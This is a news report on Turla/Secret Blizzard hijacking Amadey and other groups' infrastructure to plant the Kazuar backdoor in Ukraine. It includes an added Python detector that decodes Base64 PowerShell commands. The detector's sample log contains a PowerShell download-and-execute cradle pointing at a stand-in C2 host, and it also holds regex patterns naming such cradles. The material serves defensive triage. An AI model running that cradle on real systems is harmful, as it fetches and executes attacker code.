In a strategic cyber espionage campaign, the Russian-affiliated group known as Secret Blizzard, also referred to as Turla, has been implicated in leveraging malware from various sources to deploy the Kazuar backdoor on targets within Ukraine. This revelation comes from Microsoft’s threat intelligence team, which observed these activities occurring primarily between March and April 2024.
Use of Amadey Bot Malware
Secret Blizzard employed the Amadey malware-as-a-service (MaaS) to infiltrate systems linked to the Ukrainian military, suggesting a targeted approach toward specific entities.
Tactics and Targets
The group is known for integrating tactics like adversary-in-the-middle (AitM) attacks, strategic web compromises, and spear-phishing for surreptitious access. Their main targets often include international ministries of foreign affairs, embassies, government offices, and defense-related organizations.
Continued Operations
Recent activity marked the second time since 2022 that Secret Blizzard has parasitized a cybercrime campaign for deploying its own tools in Ukraine.
Recent Collaborations and Infrastructure
Last week, Microsoft and Lumen Technologies’ Black Lotus Labs uncovered Turla’s commandeering of 33 command-and-control (C2) servers from a hacking group in Pakistan, identified as Storm-0156, further showcasing their adeptness at utilizing other actors’ infrastructure to mask their activities.
Amadey Commandeering
Secret Blizzard possibly accessed Amadey C2 panels or used the MaaS framework to insert a PowerShell dropper into the victim's system. This dropper carried a Base64-encoded payload pointing to Turla's C2 servers.
Reconnaissance Efforts
The attackers then downloaded reconnaissance tools to collect system information and assess the host's defenses, paying particular attention to whether Microsoft Defender was running.
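The dropper described above arrives as a Base64-encoded PowerShell payload, and the reconnaissance stage queries Defender's status. The following is an added defender-side example, not code from the article or from Microsoft: it decodes `-EncodedCommand` arguments from process command lines (PowerShell encodes them as UTF-16LE, then Base64) and flags decoded scripts that query Defender state or contain a download cradle. The log lines, C2 hostname, and regex names are constructed assumptions.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample process-creation command lines (not from the article).
SAMPLE_LOG = [
    "powershell.exe -nop -w hidden -enc " + encode_ps("Get-MpComputerStatus | Select RealTimeProtectionEnabled"),
    "powershell.exe -EncodedCommand " + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/x')"),
    "powershell.exe -Command Get-Date",
    "powershell.exe -enc " + encode_ps("Write-Output 'hello'"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Detection rules run over the *decoded* script, not the Base64 string.
SUSPICIOUS = {
    "defender_status_query": re.compile(r"Get-MpComputerStatus|Get-MpPreference", re.IGNORECASE),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.IGNORECASE),
}

def decode_encoded_command(cmdline: str):
    """Return the decoded script for an encoded PowerShell command line, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed Base64 or not UTF-16LE: not a valid -EncodedCommand

def triage(log_lines):
    """Return (decoded_script, [matched_rule_names]) for each encoded command that hits a rule."""
    findings = []
    for line in log_lines:
        script = decode_encoded_command(line)
        if script is None:
            continue
        tags = [name for name, rx in SUSPICIOUS.items() if rx.search(script)]
        if tags:
            findings.append((script, tags))
    return findings

if __name__ == "__main__":
    for script, tags in triage(SAMPLE_LOG):
        print(tags, "->", script)
```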
Deployment and Obfuscation
The Tavdig backdoor is deployed using PowerShell and DLL side-loading, which then paves the way for installing Kazuar. Additionally, a PowerShell backdoor from another Russian hacker group, Flying Yeti, may have been repurposed to support these operations.
Ongoing Investigations and Expert Commentary
Microsoft is currently examining how Secret Blizzard managed to exploit the infrastructure of other groups, such as Storm-1837 and the Amadey operators, for its own ends. Leveraging third-party footholds in this way reflects sophisticated tradecraft and complicates conventional attribution. Sherrod DeGrippo, Microsoft's Director of Threat Intelligence Strategy, notes that such intricate obfuscation strategies are rare but effective, explaining that state-sponsored threat actors traditionally rely on their own dedicated infrastructure, which makes this approach particularly hard to track. As Secret Blizzard continues to expand its espionage campaigns under a cloak of operational secrecy, cybersecurity organizations remain vigilant in monitoring these evolving threats.